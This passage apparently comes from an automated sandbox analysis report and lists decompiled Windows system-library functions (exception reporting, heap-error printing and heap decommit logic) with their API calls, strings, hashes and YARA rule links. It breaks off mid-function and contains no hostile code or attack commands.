Function 6AC1B260, Relevance: 91.3, APIs: 22, Strings: 30, Instructions: 262COMMON

Download Yara Rule

APIs

DbgPrintEx.1105(00000065,00000000, *** Unhandled exception 0x%08lx, hit in %ws:%s,?,<unknown>,?,6AC40DD8,00000018,6AC1B5A3,?,6AB448A4,?,?,6ABAB74A,6AB41650,6ABAB627), ref: 6AC1B2E6
DbgPrintEx.1105(00000065,00000000, *** A stack buffer overrun occurred in %ws:%s,<unknown>,?,6AC40DD8,00000018,6AC1B5A3,?,6AB448A4,?,?,6ABAB74A,6AB41650,6ABAB627,6ABAB627), ref: 6AC1B2FD
DbgPrintEx.1105(00000065,00000000,This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.), ref: 6AC1B30C
DbgPrintEx.1105(00000065,00000000,If this bug ends up in the shipping product, it could be a severe security hole.), ref: 6AC1B31B
DbgPrintEx.1105(00000065,00000000,a NULL pointer), ref: 6AC1B4E7
DbgPrintEx.1105(00000065,00000000, *** enter .exr %p for the exception record,?), ref: 6AC1B4F8
DbgPrintEx.1105(00000065,00000000, *** enter .cxr %p for the context,?), ref: 6AC1B514
DbgPrintEx.1105(00000065,00000000, *** then kb to get the faulting stack), ref: 6AC1B523
DbgPrintEx.1105(00000065,00000000, *** Restarting wait on critsec or resource at %p (in %ws:%s),?,?,?), ref: 6AC1B546
RtlReportException.1105(00000000,?,00000000), ref: 6AC1B566

Strings

The resource is owned shared by %d threads, xrefs: 6AC1B37E
an invalid address, %p, xrefs: 6AC1B4CF
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 6AC1B53F
The instruction at %p referenced memory at %p., xrefs: 6AC1B432
Go determine why that thread has not released the critical section., xrefs: 6AC1B3C5
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 6AC1B314
*** An Access Violation occurred in %ws:%s, xrefs: 6AC1B48F
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 6AC1B38F
*** Resource timeout (%p) in %ws:%s, xrefs: 6AC1B352
*** enter .exr %p for the exception record, xrefs: 6AC1B4F1
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 6AC1B47D
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 6AC1B2DC
*** A stack buffer overrun occurred in %ws:%s, xrefs: 6AC1B2F3
<unknown>, xrefs: 6AC1B27E, 6AC1B2D1, 6AC1B350, 6AC1B399, 6AC1B417, 6AC1B48E
This failed because of error %Ix., xrefs: 6AC1B446
The critical section is owned by thread %p., xrefs: 6AC1B3B9
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 6AC1B476
read from, xrefs: 6AC1B4AD, 6AC1B4B2
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 6AC1B323
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 6AC1B3D6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 6AC1B305
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 6AC1B484
*** Inpage error in %ws:%s, xrefs: 6AC1B418
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 6AC1B39B
*** then kb to get the faulting stack, xrefs: 6AC1B51C
a NULL pointer, xrefs: 6AC1B4E0
write to, xrefs: 6AC1B4A6
*** enter .cxr %p for the context, xrefs: 6AC1B50D
The resource is owned exclusively by thread %p, xrefs: 6AC1B374
The instruction at %p tried to %s , xrefs: 6AC1B4B6

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$ExceptionReport
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 374826753-108210295
Opcode ID: 2d8d53dd706fbf63d09de7a2931569d6627c580f87b24d943adc7f18b4bf59f8
Instruction ID: 7105139733636598000cec80def4f387f37059baa2d5991a1d865251bb10ae68
Opcode Fuzzy Hash: 2d8d53dd706fbf63d09de7a2931569d6627c580f87b24d943adc7f18b4bf59f8
Instruction Fuzzy Hash: FD81D239A05140BBDB219E499C88E6E3B76EF47355F468244F6041B213EF259C62FFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6AC21C06, Relevance: 80.7, APIs: 21, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E6AC21C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x6ab448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E6AB6B150();
				} else {
					E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x6ac5589c);
				E6AB6B150("Heap error detected at %p (heap handle %p)\n",  *0x6ac558a0);
				_t27 =  *0x6ac55898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M6AC21E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E6AB6B150();
				} else {
					E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E6AB6B150("Error code: %d - %s\n",  *0x6ac55898);
				_t113 =  *0x6ac558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6AB6B150("Parameter1: %p\n",  *0x6ac558a4);
				}
				_t115 =  *0x6ac558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6AB6B150("Parameter2: %p\n",  *0x6ac558a8);
				}
				_t117 =  *0x6ac558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6AB6B150("Parameter3: %p\n",  *0x6ac558ac);
				}
				_t119 =  *0x6ac558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x6ac558b4);
					E6AB6B150("Last known valid blocks: before - %p, after - %p\n",  *0x6ac558b0);
				} else {
					_t120 =  *0x6ac558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E6AB6B150();
				} else {
					E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E6AB6B150("Stack trace available at %p\n", 0x6ac558c0);
			}

0x6ac21c10
0x6ac21c16
0x6ac21c1e
0x6ac21c3d
0x6ac21c3e
0x6ac21c20
0x6ac21c35
0x6ac21c3a
0x6ac21c44
0x6ac21c55
0x6ac21c5a
0x6ac21c65
0x6ac21c67
0x00000000
0x6ac21c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ac21c67
0x6ac21cdc
0x6ac21ce5
0x6ac21d04
0x6ac21d05
0x6ac21ce7
0x6ac21cfc
0x6ac21d01
0x6ac21d0b
0x6ac21d17
0x6ac21d1f
0x6ac21d25
0x6ac21d30
0x6ac21d4f
0x6ac21d50
0x6ac21d32
0x6ac21d47
0x6ac21d4c
0x6ac21d61
0x6ac21d67
0x6ac21d68
0x6ac21d6e
0x6ac21d79
0x6ac21d98
0x6ac21d99
0x6ac21d7b
0x6ac21d90
0x6ac21d95
0x6ac21daa
0x6ac21db0
0x6ac21db1
0x6ac21db7
0x6ac21dc2
0x6ac21de1
0x6ac21de2
0x6ac21dc4
0x6ac21dd9
0x6ac21dde
0x6ac21df3
0x6ac21df9
0x6ac21dfa
0x6ac21e00
0x6ac21e0a
0x6ac21e13
0x6ac21e32
0x6ac21e33
0x6ac21e15
0x6ac21e2a
0x6ac21e2f
0x6ac21e39
0x6ac21e4a
0x6ac21e02
0x6ac21e02
0x6ac21e08
0x00000000
0x00000000
0x6ac21e08
0x6ac21e5b
0x6ac21e7a
0x6ac21e7b
0x6ac21e5d
0x6ac21e72
0x6ac21e77
0x6ac21e95

APIs

DbgPrint.1105(HEAP[%wZ]: ,?,?,00000002,6AC558C0,6AC220B1,?,6AC1FFAF,00000001,00000020,6AC558C0,00000000), ref: 6AC21C35
DbgPrint.1105(HEAP: ,?,00000002,6AC558C0,6AC220B1,?,6AC1FFAF,00000001,00000020,6AC558C0,00000000), ref: 6AC21C3E
DbgPrint.1105(Heap error detected at %p (heap handle %p),?,00000002,6AC558C0,6AC220B1,?,6AC1FFAF,00000001,00000020,6AC558C0,00000000), ref: 6AC21C55
DbgPrint.1105(HEAP[%wZ]: ,?,00000020,6AC558C0,00000000), ref: 6AC21CFC
DbgPrint.1105(HEAP: ,00000020,6AC558C0,00000000), ref: 6AC21D05
DbgPrint.1105(Error code: %d - %s,6AB448A4,00000020,6AC558C0,00000000), ref: 6AC21D17
DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6AC558C0,00000000), ref: 6AC21D47
DbgPrint.1105(HEAP: ,?,?,?,?,6AC558C0,00000000), ref: 6AC21D50
DbgPrint.1105(Parameter1: %p,?,?,?,?,6AC558C0,00000000), ref: 6AC21D61
DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6AC558C0,00000000), ref: 6AC21D90
DbgPrint.1105(HEAP: ,?,?,?,?,6AC558C0,00000000), ref: 6AC21D99
DbgPrint.1105(Parameter2: %p,?,?,?,?,6AC558C0,00000000), ref: 6AC21DAA
DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6AC558C0,00000000), ref: 6AC21DD9
DbgPrint.1105(HEAP: ,?,?,?,?,6AC558C0,00000000), ref: 6AC21DE2
DbgPrint.1105(Parameter3: %p,?,?,?,?,6AC558C0,00000000), ref: 6AC21DF3
DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,6AC558C0,00000000), ref: 6AC21E2A
DbgPrint.1105(HEAP: ,?,?,?,?,6AC558C0,00000000), ref: 6AC21E33
DbgPrint.1105(Last known valid blocks: before - %p, after - %p,?,?,?,?,6AC558C0,00000000), ref: 6AC21E4A
DbgPrint.1105(HEAP[%wZ]: ,?,?,?,?,?,?,?,?,6AC558C0,00000000), ref: 6AC21E72
DbgPrint.1105(Stack trace available at %p,6AC558C0,?,?,?,?,?,?,?,6AC558C0,00000000), ref: 6AC21E8B

Strings

Error code: %d - %s, xrefs: 6AC21D12
Parameter2: %p, xrefs: 6AC21DA5
heap_failure_invalid_allocation_type, xrefs: 6AC21CB4
Stack trace available at %p, xrefs: 6AC21E86
heap_failure_virtual_block_corruption, xrefs: 6AC21C91
Parameter1: %p, xrefs: 6AC21D5C
HEAP[%wZ]: , xrefs: 6AC21C30, 6AC21CF7, 6AC21D42, 6AC21D8B, 6AC21DD4, 6AC21E25, 6AC21E6D
heap_failure_internal, xrefs: 6AC21C6E
HEAP: , xrefs: 6AC21C16, 6AC21C3D, 6AC21D04, 6AC21D4F, 6AC21D98, 6AC21DE1, 6AC21E32, 6AC21E7A
heap_failure_entry_corruption, xrefs: 6AC21C83
heap_failure_cross_heap_operation, xrefs: 6AC21CC2
heap_failure_block_not_busy, xrefs: 6AC21CA6
Last known valid blocks: before - %p, after - %p, xrefs: 6AC21E45
heap_failure_freelists_corruption, xrefs: 6AC21CC9
heap_failure_multiple_entries_corruption, xrefs: 6AC21C8A
heap_failure_buffer_overrun, xrefs: 6AC21C98
heap_failure_listentry_corruption, xrefs: 6AC21CD0
Heap error detected at %p (heap handle %p), xrefs: 6AC21C50
heap_failure_unknown, xrefs: 6AC21C75
heap_failure_usage_after_free, xrefs: 6AC21CBB
heap_failure_invalid_argument, xrefs: 6AC21CAD
heap_failure_buffer_underrun, xrefs: 6AC21C9F
heap_failure_lfh_bitmap_mismatch, xrefs: 6AC21CD7
Parameter3: %p, xrefs: 6AC21DEE
heap_failure_generic, xrefs: 6AC21C7C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 3558298466-2897834094
Opcode ID: 60643789eaa009639865160f3c85607f757555ab5e8203b3c6f8ae70fc89d1bc
Instruction ID: f031404f96d71855a37264653a540e79eba92e456f8e2dd38a0bc6cf15bf7813
Opcode Fuzzy Hash: 60643789eaa009639865160f3c85607f757555ab5e8203b3c6f8ae70fc89d1bc
Instruction Fuzzy Hash: 6861997F4A16D8EFE7158F4DD488D2873F4FB06634B4A4059F5046B312EF259C90BA29

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8A309, Relevance: 49.7, APIs: 22, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E6AB8A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x6ac58a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E6AB8A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E6AB8DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E6AB69373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E6AB6A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x6ac58748 - 1;
						if( *0x6ac58748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E6AB6B150();
								} else {
									E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E6AB6B150();
								__eflags =  *0x6ac57bc8;
								if( *0x6ac57bc8 == 0) {
									__eflags = 1;
									E6AC22073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x6ac58748 - 1;
							if( *0x6ac58748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E6AB9174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E6AB87D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E6AC214FB(_t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E6AB69373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E6AB69819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x6ac58748 - 1;
									if( *0x6ac58748 >= 1) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E6AB6B150();
											} else {
												E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E6AB6B150();
											_pop(_t491);
											__eflags =  *0x6ac57bc8 - _t449;
											if( *0x6ac57bc8 == _t449) {
												__eflags = 0;
												_t491 = 1;
												E6AC22073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E6AC2A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E6AB8A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E6AB87D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E6AB87D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E6AC21411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E6AB87D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E6AB87D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x6ac58748 - 1;
							if( *0x6ac58748 < 1) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E6AB6B150();
							} else {
								E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E6AB6B150();
							__eflags =  *0x6ac57bc8;
							if( *0x6ac57bc8 == 0) {
								__eflags = 0;
								E6AC22073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
